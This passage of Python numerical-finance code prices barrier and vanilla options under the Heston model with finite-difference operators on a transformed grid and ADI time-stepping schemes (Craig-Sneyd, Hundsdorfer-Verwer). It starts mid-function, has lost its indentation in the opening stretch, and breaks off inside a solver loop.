#F1 = F0 - A*F0 + 0.5*A*A*F0 - 1.0/6* A*A*A*F0# A*F0 + 0.5*A*(I-A/3)*(A*F0)
updatePayoffBoundary(F, Sc, B,iBarrier,M,L)
F0 = lu0.solve(F)
updatePayoffBoundary(F0, Sc, B,iBarrier,M,L)
F1 = lu0.solve(F0)
F = F1
for i in range(N-2):
Fr= F-0.5*A*(F - 1.0/6*A*F)
updatePayoffBoundary(Fr, S, B,iBarrier,M,L)
# F1 = lu2.solve(Fr)
# updatePayoffBoundary(F1, S, B,iBarrier,M,L)
F = lu.solve(Fr)
else:
if B == 0:
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
for i in range(N):
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
else:
for i in range(N):
ti = T*(N-i-1)/N
Sc = np.array([cFunc.evaluate(ti, Si) for Si in S])
iBarrier = np.searchsorted(Sc,B) #S[i-1]<B<=S[i]
# print("ti",ti,"iB",iBarrier, M,Sc,B)
A0 = A0Full.copy()
A1 = A1Full.copy()
A2 = A2Full.copy()
BC = lil_matrix((L*M,L*M))
updateSystemBoundary(L, M, iBarrier, Sc, B, A0, A1, A2, BC)
A = A0+A1+A2
Li = I+A+BC
lu = sla.splu(Li)
updatePayoffBoundary(F,Sc,B,iBarrier,M,L)
F = lu.solve(F)
end=time.time()
#F[50+4*M]
#S0=101.52
Payoff = F.reshape(L,M)
#print("Payoff V=0",Payoff[0])
jv0 = np.searchsorted(V,v0)
#print("Payoff V=V0",V[jv0])
#for (si,pi) in zip(S, Payoff[jv0]):
# print(si, pi)
#
# # istrike =np.searchsorted(S,K)
# # print("Payoff S=K",S[istrike])
# # for (vi,pi) in zip(V, Payoff[:][istrike]):
# # print(vi, pi)
# plt.grid(True)
# plt.plot(S[:30], Payoff[jv0][:30])
# #plt.plot(V,Payoff[:][istrike])
# plt.yscale('symlog',linthreshy=1e-6)
# plt.show()
#Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
Payoffi = interpolate.RectBivariateSpline(V,X,Payoff,kx=3,ky=3,s=0)
maxError = 0.0
# Payoffi = interpolate.interp2d(S,V,Payoff,kind='cubic')
#print("spot method n m l price delta gamma error")
#Vp = [(Payoffi(v0,x,dy=2)[0][0]-Payoffi(v0,x,dy=1)[0][0])*np.exp(-2*(x)) for x in X]
#for Si, Vi in zip(S,Vp):
# print(Si, "HV-Euler", Vi)
#plt.grid(True)
## plt.plot(S, [Payoffi(v0,math.log(Si),dy=1)[0][0]/(Si) for Si in S])
#plt.plot(S, [Payoffi(v0,math.log(Si),dy=2)[0][0]/(Si*Si)-Payoffi(v0,math.log(Si),dy=1)[0][0]/(Si*Si) for Si in S])
## #plt.plot(V,Payoff[:][istrike]) d (dV/dx dx/ds) /dx dx/ds = d ( 1/)
## plt.yscale('symlog',linthreshy=1e-6)
#plt.show()
for spot,refPrice in zip(spotArray,priceArray):
xspot = math.log(spot)
price = Payoffi(v0,xspot)[0][0]
delta = Payoffi(v0,xspot,dy=1)[0][0]
gamma = Payoffi(v0,xspot,dy=2)[0][0]
error = price -refPrice
if abs(error) > maxError:
maxError = abs(error)
if B==0:
print(spot,method,N,M,L, price, delta,gamma,error,end-start)
if not B==0:
print(method,N,M,L,Payoffi(v0,math.log(K))[0][0],end-start)
# else:
# print(method,N,M,L,maxError,end-start)
def craigSneydBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv):
    """Craig-Sneyd ADI time stepping using banded tridiagonal solves.

    Marches ``F`` through ``N`` steps. ``A1tri``/``A2tri`` are scaled and
    shifted IN PLACE into the banded layout of ``I + 0.5*A1`` (resp. ``A2``)
    expected by ``scipy.linalg.solve_banded``. ``indices``/``indicesInv``
    permute between the orderings that make each directional operator
    tridiagonal. Returns the final state vector.
    """
    weight = 0.5
    # Build the implicit banded operators in place: I + weight*A_k.
    A1tri *= weight
    A1tri[1, :] += 1
    A2tri *= weight
    A2tri[1, :] += 1

    def _solve1(rhs):
        # Implicit sweep in the first direction.
        return la.solve_banded((1, 1), A1tri, rhs, overwrite_ab=False,
                               overwrite_b=True, check_finite=False)

    def _solve2(rhs):
        # Implicit sweep in the second (permuted) direction.
        return la.solve_banded((1, 1), A2tri, rhs, overwrite_ab=False,
                               overwrite_b=True, check_finite=False)

    for _ in range(N):
        explicit = (I - A0 - A1 - A2) * F  # fully explicit predictor stage
        stage1 = _solve1(explicit + weight * A1 * F)
        stage2 = _solve2((stage1 + weight * A2 * F)[indicesInv])
        predictor = stage2[indices]
        # Craig-Sneyd correction on the mixed-derivative operator A0.
        corrected = explicit - 0.5 * (A0 * (predictor - F))
        stage1 = _solve1(corrected + weight * A1 * F)
        stage2 = _solve2((stage1 + weight * A2 * F)[indicesInv])
        F = stage2[indices]
    return F
def hundsdorferVerwerBanded(N, F, I, A0, A1, A2,A1tri,A2tri, indices, indicesInv):
    """Hundsdorfer-Verwer ADI time stepping using banded tridiagonal solves.

    Same calling convention as craigSneydBanded: ``A1tri``/``A2tri`` are
    turned IN PLACE into the banded form of ``I + a*A1`` / ``I + a*A2`` with
    a = 1/2 + sqrt(3)/6, and ``indices``/``indicesInv`` map between the two
    directional orderings. Returns the state after ``N`` steps.
    """
    a = 0.5 + math.sqrt(3) / 6
    A1tri *= a
    A1tri[1, :] += 1
    A2tri *= a
    A2tri[1, :] += 1
    for _ in range(N):
        # Predictor: explicit full step followed by two implicit sweeps.
        explicit = (I - A0 - A1 - A2) * F
        rhs = explicit + a * A1 * F
        sweep1 = la.solve_banded((1, 1), A1tri, rhs, overwrite_ab=False,
                                 overwrite_b=True, check_finite=False)
        rhs = sweep1 + a * A2 * F
        sweep2 = la.solve_banded((1, 1), A2tri, rhs[indicesInv],
                                 overwrite_ab=False, overwrite_b=True,
                                 check_finite=False)
        predictor = sweep2[indices]
        # Corrector: trapezoidal recombination of F and the predictor.
        rhs = F - 0.5 * (A0 + A1 + A2) * (F + predictor)
        rhs = rhs + a * A1 * predictor
        sweep1 = la.solve_banded((1, 1), A1tri, rhs, overwrite_ab=False,
                                 overwrite_b=True, check_finite=False)
        rhs = sweep1 + a * A2 * predictor
        sweep2 = la.solve_banded((1, 1), A2tri, rhs[indicesInv],
                                 overwrite_ab=False, overwrite_b=True,
                                 check_finite=False)
        F = sweep2[indices]
    return F
@jit(nopython=True)
def updatePayoffBoundary(F, S, B, iBarrier, M,L):
    # Knock-out below the barrier: zero the first iBarrier spot nodes of
    # every variance slice. No-op when there is no barrier (B == 0).
    if B != 0:
        for j in range(L):
            base = j * M
            F[base:base + iBarrier] = 0
@jit(nopython=True)
def updatePayoffExplicit(F, S, B, iBarrier, M,L):
    # Zero all nodes strictly below the barrier node, then set the node just
    # under the barrier by linear extrapolation from F[iBarrier] so that the
    # interpolated value vanishes exactly at S = B:
    #   F[iB-1] = F[iB] * (S[iB-1]-B)/(S[iB]-B)
    if B != 0:
        for j in range(L):
            base = j * M
            F[base:base + iBarrier - 1] = 0
            F[base + iBarrier - 1] = F[base + iBarrier] * (S[iBarrier-1]-B)/(S[iBarrier]-B)
@jit(nopython=True)
def updatePayoffBoundaryTrans(F, S, B, iBarrierList, M,L):
    # Barrier knock-out on the transformed grid, where the barrier index
    # differs per variance slice: zero the first iBarrierList[j] nodes of
    # slice j. No-op when B == 0.
    if B != 0:
        for j in range(L):
            base = j * M
            nBelow = iBarrierList[j]  # S[i-1] < B <= S[i] within slice j
            for i in range(nBelow):
                F[base + i] = 0
@jit(nopython=True)
def updatePayoffExplicitTrans(F, S, B, iBarrierList, M,L):
    # Explicit barrier enforcement on the transformed grid: zero everything
    # strictly below the per-slice barrier node, then linearly extrapolate
    # the node just below the barrier so the value is exactly 0 at S = B.
    # FIX: on this grid S is a flattened (M*L) array with one spot row per
    # variance slice, so S must be indexed within slice j (base + i), as in
    # the BC rows of createSystemTrans; the previous code read S[iBarrier-1]
    # and S[iBarrier] from slice 0 for every j.
    if B != 0:
        for j in range(L):
            base = j * M
            ib = iBarrierList[j]  # S[i-1] < B <= S[i] within slice j
            F[base:(ib - 1 + base)] = 0
            F[ib - 1 + base] = F[ib + base] * (S[ib - 1 + base] - B) / (S[ib + base] - B)
#@jit(nopython=True)
def createSystemTrans(useExponentialFitting,B,iBarrierList,S,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L):
    """Assemble the discrete Heston operators on the transformed grid
    x = ln(S) + alpha*v (with alpha = -rho/sigma chosen by the caller the
    mixed derivative vanishes, hence A0 == 0.0 here).

    Returns (F, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv):
    F is a copy of the payoff F0; A1/A2 the dt-scaled one-dimensional
    operators in x and v (lil matrices, dt = -T/N so the scheme marches
    backwards from maturity); BC holds the barrier interpolation rows;
    A1tri/A2tri/indices/indicesInv come from createTridiagonalIndices.
    S is the flattened (M*L) spot grid with one row per variance level,
    hence the S[i + j*M] indexing below; iBarrierList gives the per-slice
    barrier index (S[i-1] < B <= S[i]). JV/JVm are the variance-grid
    Jacobians at nodes and midpoints. When useExponentialFitting is set,
    the diffusion coefficient is fitted (tanh rule) wherever the cell
    Peclet number exceeds upwindingThreshold.
    """
    upwindingThreshold = 10.0
    F = np.array(F0,copy=True)
    dt = -T/N
    A1 = lil_matrix((L*M,L*M))
    A2 = lil_matrix((L*M,L*M))
    BC = lil_matrix((L*M,L*M))
    #boundary conditions, 0,0, 0,L-1, M-1,0, M-1,L-1.
    if B == 0:
        # Corners at the lowest spot node (i=0): first-order one-sided
        # convection, half the discount split between A1 and A2.
        i=0
        j=0
        A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(hm))
        A1[i+j*M,i+j*M] += dt*(-r*0.5)
        A1[i+j*M,(i)+j*M] += dt*(-(r-q)/hm)
        A2[i+j*M,i+j*M] += dt*(-r*0.5)
        #A[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
        #A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
        i=0
        j=L-1
        A1[i+j*M,(i+1)+j*M] += dt*((r-q)/hm)
        A1[i+j*M,i+j*M] += dt*(-r*0.5)
        A1[i+j*M,(i)+j*M] += dt*(-(r-q)/hm)
        A2[i+j*M,i+j*M] += dt*(-r*0.5)
    else:
        # Barrier rows (corner variance slices): Dirichlet value 0 at S=B is
        # imposed through linear interpolation between nodes iBarrier-1 and
        # iBarrier; note the per-slice S indexing S[iBarrier + j*M].
        j=0
        iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
        BC[iBarrier-1+j*M,iBarrier-1+j*M]=(S[iBarrier+j*M]-B)/(S[iBarrier+j*M]-S[iBarrier-1+j*M])-1
        BC[iBarrier-1+j*M,iBarrier+j*M]=(B-S[iBarrier-1+j*M])/(S[iBarrier+j*M]-S[iBarrier-1+j*M])
        # for i in range(iBarrier-1):
        #     A[i+j*M,i+(j)*M]=0.0
        j=L-1
        iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
        BC[iBarrier-1+j*M,iBarrier-1+j*M]=(S[iBarrier+j*M]-B)/(S[iBarrier+j*M]-S[iBarrier-1+j*M])-1
        BC[iBarrier-1+j*M,iBarrier+j*M]=(B-S[iBarrier-1+j*M])/(S[iBarrier+j*M]-S[iBarrier-1+j*M])
    #A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
    #A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
    # Corners at the highest spot node (i=M-1): one-sided convection.
    i=M-1
    j=L-1
    A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(hm))
    A1[i+j*M,i+j*M] += dt*(-r*0.5)
    A1[i+j*M,(i)+j*M] += dt*((r-q)/(hm))
    A2[i+j*M,i+j*M] += dt*(-r*0.5)
    #A[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
    #A[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
    i=M-1
    j=0
    A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(hm))
    A1[i+j*M,i+j*M] += dt*(-r*0.5)
    A1[i+j*M,(i)+j*M] += dt*((r-q)/(hm))
    A2[i+j*M,i+j*M] += dt*(-r*0.5)
    #A[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
    #A[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
    #boundary conditions j=0,L-1.
    # Lowest variance slice (j=0): interior x stencil, one-sided v drift.
    j=0
    iBarrier = 1
    if not B == 0:
        iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
    for i in range(iBarrier,M-1):
        #svj = sigma*sigma*V[j]/(JV[j])
        #driftj = kappa*(theta-V[j])
        svi = V[j]*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
        drifti = (r-q-0.5*V[j]+kappa*(theta-V[j])*alpha)
        if useExponentialFitting:
            if abs(drifti*hm/svi) > upwindingThreshold:
                # Exponential fitting: inflate diffusion to keep positivity.
                svi = drifti*hm/math.tanh(drifti*hm/svi)
                #svi = svi + 0.5*abs(drifti)*hm
        A1[i+j*M,(i+1)+j*M] += dt*(svi*0.5/(hm*hm)+drifti/(2*hm))
        A1[i+j*M,i+j*M] += dt*(-svi/(hm*hm)-r*0.5)
        A1[i+j*M,(i-1)+j*M] += dt*(svi*0.5/(hm*hm)-drifti/(2*hm))
        A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl))
        A2[i+j*M,i+j*M] += dt*(-r*0.5)
        A2[i+j*M,i+(j)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
    # Highest variance slice (j=L-1): mirror of the j=0 treatment.
    j=L-1
    iBarrier = 1
    if not B == 0:
        iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
    for i in range(iBarrier,M-1):
        svi = V[j]*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
        drifti = (r-q-0.5*V[j]+kappa*(theta-V[j])*alpha)
        if useExponentialFitting:
            if abs(drifti*hm/svi) > upwindingThreshold:
                svi = drifti*hm/math.tanh(drifti*hm/svi)
                # svi = svi + 0.5*abs(drifti)*hm
        A1[i+j*M,(i+1)+j*M] += dt*(svi*0.5/(hm*hm)+drifti/(2*hm))
        A1[i+j*M,i+j*M] += dt*(-svi/(hm*hm)-r*0.5)
        A1[i+j*M,(i-1)+j*M] += dt*(svi*0.5/(hm*hm)-drifti/(2*hm))
        A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl))
        A2[i+j*M,i+j*M] += dt*(-r*0.5)
        A2[i+j*M,i+(j)*M] += dt*(kappa*(theta-V[j])/(JV[j]*hl))
    # Interior variance slices.
    for j in range(1,L-1):
        #boundary conditions i=0,M-1.
        iBarrier = 1
        if B == 0:
            i=0
            A1[i+j*M,(i+1)+j*M] += dt*((r-q)/(hm))
            A1[i+j*M,i+j*M] += dt*(-r*0.5)
            A1[i+j*M,(i)+j*M] += dt*(-(r-q)/(hm))
            A2[i+j*M,i+j*M] += dt*(-r*0.5)
        else:
            iBarrier = iBarrierList[j] #S[i-1]<B<=S[i]
            BC[iBarrier-1+j*M,iBarrier-1+j*M]=(S[iBarrier+j*M]-B)/(S[iBarrier+j*M]-S[iBarrier-1+j*M])-1
            BC[iBarrier-1+j*M,iBarrier+j*M]=(B-S[iBarrier-1+j*M])/(S[iBarrier+j*M]-S[iBarrier-1+j*M])
            #A2[i+j*M,i+(j+1)*M] += dt*(+kappa*(theta-V[j])/(JV[j]*hl*2)) #makes it explode!
            #A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(JV[j]*hl*2))
        i=M-1
        A1[i+j*M,(i-1)+j*M] += dt*(-(r-q)/(hm))
        A1[i+j*M,i+j*M] += dt*(-r*0.5)
        A1[i+j*M,(i)+j*M] += dt*((r-q)/(hm))
        A2[i+j*M,i+j*M] += dt*(-r*0.5)
        #A2[i+j*M,i+(j-1)*M] += dt*(-kappa*(theta-V[j])/(2*JV[j]*hl))
        #A2[i+j*M,i+(j+1)*M] += dt*(kappa*(theta-V[j])/(2*JV[j]*hl))
        # Interior stencil: central differences in x and v, with optional
        # exponential fitting in each direction.
        for i in range(iBarrier,M-1):
            svj = sigma*sigma*V[j]/(JV[j])
            driftj = kappa*(theta-V[j])
            svi = V[j]*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
            drifti = (r-q-0.5*V[j]+kappa*(theta-V[j])*alpha)
            if useExponentialFitting:
                if abs(drifti*hm/svi) > upwindingThreshold:
                    svi = drifti*hm/math.tanh(drifti*hm/svi)
                    # svi = svi + 0.5*abs(drifti)*hm
                if driftj != 0 and abs(driftj*hl/svj) > upwindingThreshold:
                    # svj = svj + 0.5*abs(driftj)*hl
                    svj = driftj*hl/math.tanh(driftj*hl/svj)
            A1[i+j*M,(i+1)+j*M] += dt*(svi*0.5/(hm*hm)+drifti/(2*hm))
            A1[i+j*M,i+j*M] += dt*(-(svi)/(hm*hm)-r*0.5)
            A1[i+j*M,(i-1)+j*M] += dt*(svi*0.5/(hm*hm)-drifti/(2*hm))
            A2[i+j*M,i+(j+1)*M] += dt*(0.5*svj/(JVm[j+1]*hl*hl)+driftj/(2*JV[j]*hl))
            A2[i+j*M,i+j*M] += dt*(-r*0.5-0.5*svj/(hl*hl)*(1.0/JVm[j+1]+1.0/JVm[j]))
            A2[i+j*M,i+(j-1)*M] += dt*(0.5*svj/(JVm[j]*hl*hl)-driftj/(2*JV[j]*hl))
    A1tri, A2tri, indices, indicesInv = createTridiagonalIndices(M,L)
    # for i in range(M):
    #     for j in range(L):
    #         #A2tri[1,j+i*L] = A2[i+j*M,i+j*M]
    #         #if j < L-1:
    #         #    A2tri[-1,j+i*L] = A2[i+(j+1)*M,i+(j)*M]
    #         if j >0:
    #             A2tri[0,j+i*L] = A2[i+(j-1)*M,i+(j)*M]
    # No mixed-derivative operator on this transformed grid.
    A0 = 0.0
    return F,A0,A1,A2,BC,A1tri, A2tri, indices, indicesInv
def createTridiagonalIndices(M,L):
    """Allocate banded scratch arrays and the grid-ordering permutations.

    Returns (A1tri, A2tri, indices, indicesInv): two zero-initialised
    (3, M*L) banded buffers for solve_banded, plus the permutation pair
    satisfying indices[i + j*M] == j + i*L and its inverse
    indicesInv[j + i*L] == i + j*M, used to transpose the flattened
    (M, L) grid between S-major and V-major orderings without copies of
    the sparse operators.
    """
    size = M * L
    A1tri = np.zeros((3, size))
    A2tri = np.zeros((3, size))
    indices = np.zeros(size, dtype=int)
    indicesInv = np.zeros(size, dtype=int)
    for i in range(M):
        for j in range(L):
            sMajor = i + j * M
            vMajor = j + i * L
            indices[sMajor] = vMajor
            indicesInv[vMajor] = sMajor
    return A1tri, A2tri, indices, indicesInv
def objectivePayoff(K, lnK, hm, alpha, vj, xij, v):
    """Closed-form cell average of the call payoff exp(x - alpha*(vj-v)) - K
    over a cell of half-width hm centred at xij, split according to where
    the strike kink falls relative to the cell.
    """
    shift = alpha * (vj - v) + lnK
    if xij < -hm + shift:
        # Whole cell is out of the money: the average payoff is zero.
        return 0.0
    if xij > hm + shift:
        # Whole cell is in the money: exact average of exp minus the strike.
        return -K + 2 * (math.cosh(hm) - 1) * math.exp(xij + alpha * (v - vj)) / (hm * hm)
    # The strike lies inside the cell: integrate piecewise around the kink.
    eterm = math.exp(xij - alpha * (vj - v))
    y0 = -lnK + xij - alpha * (vj - v)
    eY0 = K  # == eterm*exp(-y0) by construction of y0
    if xij > shift:
        # Kink in the upper half-cell.
        i1 = (hm - 1) / (hm * hm) * eterm + (eY0 * (y0 + 1 - hm) + K * y0 * y0 / 2 - K * hm * y0) / (hm * hm)
        i2 = -K / 2 + eterm * (math.exp(hm) - (hm + 1)) / (hm * hm)
        return i1 + i2
    # Kink in the lower half-cell (the upper-half contribution i1 is zero).
    i2 = eterm * math.exp(hm) / (hm * hm) - K / 2 * (1 + y0 * y0 / (hm * hm) + 2 * y0 / hm) - 2 * eY0 * (y0 + hm + 1) / (2 * hm * hm)
    return i2
#@jit(nopython=True)
def smoothKreissTrans(L,M,X,V,hm,alpha,K, sign, cFunc,F0):
    """Kreiss-style smoothing of the initial payoff on the transformed grid.

    For each interior-variance node (j = 1..L-2) and every x node, replaces
    F0[i + j*M] with the payoff averaged against a tent (hat) weight over
    one grid cell in x and v, computed by scipy's dblquad. Boundary
    variance rows j = 0 and j = L-1 are left untouched.
    NOTE(review): cFunc.evaluate is called with a single argument here
    whereas other call sites pass (t, S) — confirm the intended signature.
    """
    for j in range(1, L - 1):
        vj = V[j]
        dv = (V[j + 1] - V[j - 1]) / 2  # local half-width of the variance cell
        for i in range(M):
            xi = X[i]

            def weightedPayoff(v, y, xi=xi, vj=vj, dv=dv):
                spot = math.exp(xi - y - alpha * (vj - v))
                intrinsic = max(sign * (cFunc.evaluate(spot) - K), 0)
                return intrinsic * (1 - abs(y) / hm) * (1 - abs(v) / dv)

            cellAvg = integrate.dblquad(weightedPayoff, -hm, hm,
                                        lambda x: -dv, lambda x: dv)
            F0[i + j * M] = cellAvg[0] / (dv * hm)
def priceCallTransformed(spotArray, priceArray, v0, kappa, theta, sigma, rho, r, q, T, cFunc, K,B, N, M, L):
    """Price a (possibly barrier) Heston option on the transformed grid
    x = ln(S) + alpha*v with alpha = -rho/sigma (removes the mixed term).

    method selects the splitting scheme ("EU","CS","DO","PR","CN","PRLS",
    "SLSB","Glowinski","SLS", anything else -> "LS"); damping optionally
    applies a start-up damping step before the main loop. cFunc maps
    (t, S) to the effective spot used for payoff/barrier location, and a
    time-dependent barrier is handled by rebuilding the system each step.
    Prints the price (and error vs priceArray when B == 0) at the end.
    """
    isCall = False
    method = "PR" # "LODLS" "CS" "LS","CN","DO"
    damping = "Euler" #"None" "One", "Euler"
    smoothing = "None" #"None","Kreiss"
    useVLinear = False
    useExponentialFitting=True
    alpha = -rho/sigma
    epsilon = 1e-3
    # Variance bounds from noncentral chi-square quantiles of V_T.
    dChi = 4*kappa*theta/(sigma*sigma)
    chiN = 4*kappa*math.exp(-kappa*T)/(sigma*sigma*(1-math.exp(-kappa*T)))
    vmax = ncx2.ppf((1-epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
    vmin = ncx2.ppf((epsilon),dChi,v0*chiN)*math.exp(-kappa*T)/chiN
    # print("vmax",vmin,vmax, 10*v0)
    vmin=max(1e-3,vmin) #Peclet explodes at V=0!
    #vmax=10*v0#0.28
    V = np.linspace(vmin,vmax,L)
    hl = V[1]-V[0]
    JV=np.ones(L)
    JVm=np.ones(L)
    if not useVLinear:
        # Sinh-stretched variance grid concentrated around v0; JV/JVm are
        # the Jacobians at nodes and midpoints.
        vscale = v0*2
        u = np.linspace(0,1,L) #1e-4,math.sqrt(vmax),L) #ideally, concentrated around v0: V=sinh((w-w0)/c). w unif
        c1 = math.asinh((vmin-v0)/vscale)
        c2 = math.asinh((vmax-v0)/vscale)
        V = v0 + vscale*np.sinh((c2-c1)*u+c1)
        hl = u[1]-u[0]
        JV = vscale*(c2-c1)* np.cosh((c2-c1)*u+c1)
        JVm = vscale*(c2-c1)* np.cosh((c2-c1)*(u-hl/2)+c1)
    #case 1:
    #Xspan = 6*math.sqrt(theta*T)
    #case 2: Xspan = 10*math.sqrt(theta*T)
    #5ok, 6 breaks on case 1!? 800x200
    Xspan = 4*math.sqrt(theta*T) #max(4*math.sqrt(theta*T),(0.5*math.sqrt(v0*T)+abs(alpha*vmax))) #+abs(r-q)*T
    Kinv = cFunc.solve(K)
    Xmin = math.log(Kinv)-Xspan+alpha*v0
    Xmax = math.log(Kinv)+Xspan+alpha*v0
    #print("Xmin",Xmin,"Xmax",Xmax)
    X = np.linspace(Xmin,Xmax,M)
    hm = X[1]-X[0]
    #V
    # pecletL = np.zeros(L)
    # pecletM = np.zeros(L)
    # sCoeff = V*(1+sigma*sigma*alpha*alpha+2*rho*sigma*alpha)
    # dCoeff = r-q-0.5*V+kappa*(theta-V)*alpha
    # pecletM = dCoeff/sCoeff*hm
    # sCoeff = sigma*sigma*V/(JV*JVm)
    # dCoeff = kappa*(theta-V)/JV
    # pecletL = dCoeff/sCoeff*hl
    # print("PecletL",pecletL)
    # print("PecletM",pecletM)
    # Terminal payoff on the flattened (M*L) grid: S = exp(x - alpha*v).
    F0 = np.zeros(M*L)
    S = np.zeros(M*L)
    lnK = math.log(K)
    sign = 1
    if not isCall:
        sign = -1
    for j in range(L):
        for i in range(M):
            S[i+j*M]=np.exp(X[i]-alpha*V[j])
    Sc = np.array([cFunc.evaluate(T,Si) for Si in S])
    F0 = np.maximum(sign*(Sc-K),0)
    if smoothing == "Kreiss":
        smoothKreissTrans(L,M,X,V,hm,alpha, K,sign,cFunc,F0)
    #payoff = lambda x: np.maximum(np.exp(x-alpha*V[j])-K,0)
    #value = integrate.quadrature( payoff, X[iStrike]-hm/2, X[iStrike]+hm/2)
    # int_xK^A exp(x-al*v)-K = exp(x-al*v)-K-K*(x-xK)
    #xm = X[iStrike]+hm/2
    #value = np.exp(xm-alpha*V[j])-K-K*(xm-xk) #int vm
    #if j > 0 and j < L-1:
    #    value = (np.exp(xm-alpha*(V[j-1]+V[j])/2)-np.exp(xm-alpha*(V[j+1]+V[j])/2))/(alpha*(V[j+1]-V[j-1])/2)-K-K*(xm-xk)
    #F0[iStrike+j*M] = value/hm
    # for j in range(L):
    #     plt.grid(True)
    #     plt.plot(X, F0[j*M:j*M+M])
    #     plt.show()
    # Per-variance-slice barrier index on the transformed grid.
    iBarrierList = np.zeros(L,dtype='int')
    for j in range(L):
        iBarrierList[j] = np.searchsorted(Sc[j*M:(j+1)*M],B) #S[i-1]<B<=S[i]
    #print("iBarrierList",iBarrierList)
    start = time.time()
    F, A0, A1, A2, BC, A1tri, A2tri, indices, indicesInv = createSystemTrans(useExponentialFitting,B,iBarrierList,Sc,F0, V, JV, JVm, r,q,kappa,theta,rho,sigma,alpha, hm,hl,T, N, M, L)
    end = time.time()
    #print("setup matrices",end-start)
    # Extract the tridiagonal bands of A1 (S-major) and of the permuted A2
    # (V-major) for the banded solvers.
    A1 = A1.tocsc()
    A2 = A2.tocsc()
    A1tri[1,:] = A1.diagonal(k=0)
    A1tri[-1,:-1] = A1.diagonal(k=-1)
    A1tri[0,1:] = A1.diagonal(k=1)
    A2tri[1,:] = A2.diagonal(k=0)[indicesInv]
    A2i = A2[:,indicesInv]
    A2i = A2i[indicesInv,:]
    #print("size",A2i.shape)
    A2tri[-1,:-1] = A2i.diagonal(k=-1)
    A2tri[0,1:] = A2i.diagonal(k=1)
    # ab = np.ones((3, n - 1), dtype=float)
    #ab[0,0] = 0 # Because top row is upper diag with one less elem
    #ab[1, :] = 4
    #ab[-1,-1] = 0 # Because bottom row is lower diag with one less elem
    #
    end = time.time()
    #print("setup tri",end-start)
    I = identity(M*L,format="csc")
    start=time.time()
    if damping == "Euler":
        # Damped start: two implicit steps with a = 0.5 (Rannacher-style).
        A = A0+A1+A2
        a = 0.5
        Li = I+a*A+BC
        lu = sla.splu(Li)
        updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
        F = lu.solve(F)
        updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
        F = lu.solve(F)
        N -= 1
    if method == "EU":
        A = A0+A1+A2
        Li = I+A+BC
        lu = sla.splu(Li)
        for i in range(N):
            updatePayoffBoundaryTrans(F,Sc,B,iBarrierList,M,L)
            F=lu.solve(F)
    elif method == "CS":
        a = 0.5
        lu1 = sla.splu(I+a*A1+BC)
        lu2 = sla.splu(I+a*A2+BC)
        # A1tri*=a
        # A1tri[1,:]+=1
        # A2tri*=a
        # A2tri[1,:]+=1
        # def solveCS(a,F):
        #    for i in range(N):
        #        Y0 = F-(A0+A1+A2)*F #explicit
        #        Y1 = la.solve_banded((1, 1), A1tri, Y0+a*(A1*F), overwrite_ab=False,overwrite_b=True, check_finite=False)
        #        Y1t = Y1+a*(A2*F)
        #        Y1t = Y1t[indicesInv]
        #        Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
        #        Y2 = Y2t[indices]
        #        Y0 = Y2- 0.5*(A0*Y2-A0*F)
        #        Y1 = la.solve_banded((1, 1), A1tri, Y0+a*(A1*F), overwrite_ab=False,overwrite_b=True, check_finite=False)
        #        Y1t = Y1+a*(A2*F)
        #        Y1t = Y1t[indicesInv]
        #        Y2t = la.solve_banded((1, 1), A2tri, Y1t, overwrite_ab=False,overwrite_b=True, check_finite=False)
        #        F = Y2t[indices]
        for i in range(N):
            #updatePayoffExplicitTrans(F,S,B,iBarrierList,M,L)
            Y0 = (I-A0-A1-A2)*F #explicit
            #updatePayoffExplicitTrans(Y0,S,B,iBarrierList,M,L)
            Y0r = Y0+a*A1*F
            updatePayoffBoundaryTrans(Y0r,Sc,B,iBarrierList,M,L)
            Y1 = lu1.solve(Y0r)
            Y1r = Y1+a*A2*F
            updatePayoffBoundaryTrans(Y1r,Sc,B,iBarrierList,M,L)
            Y2 = lu2.solve(Y1r)
            Y0t = Y0 - 0.5*(A0*Y2-A0*F)
            Y0r = Y0t + a*A1*F
            updatePayoffBoundaryTrans(Y0r,Sc,B,iBarrierList,M,L)
            Y1t = lu1.solve(Y0r)
            Y1r = Y1t+a*A2*F
            updatePayoffBoundaryTrans(Y1r,Sc,B,iBarrierList,M,L)
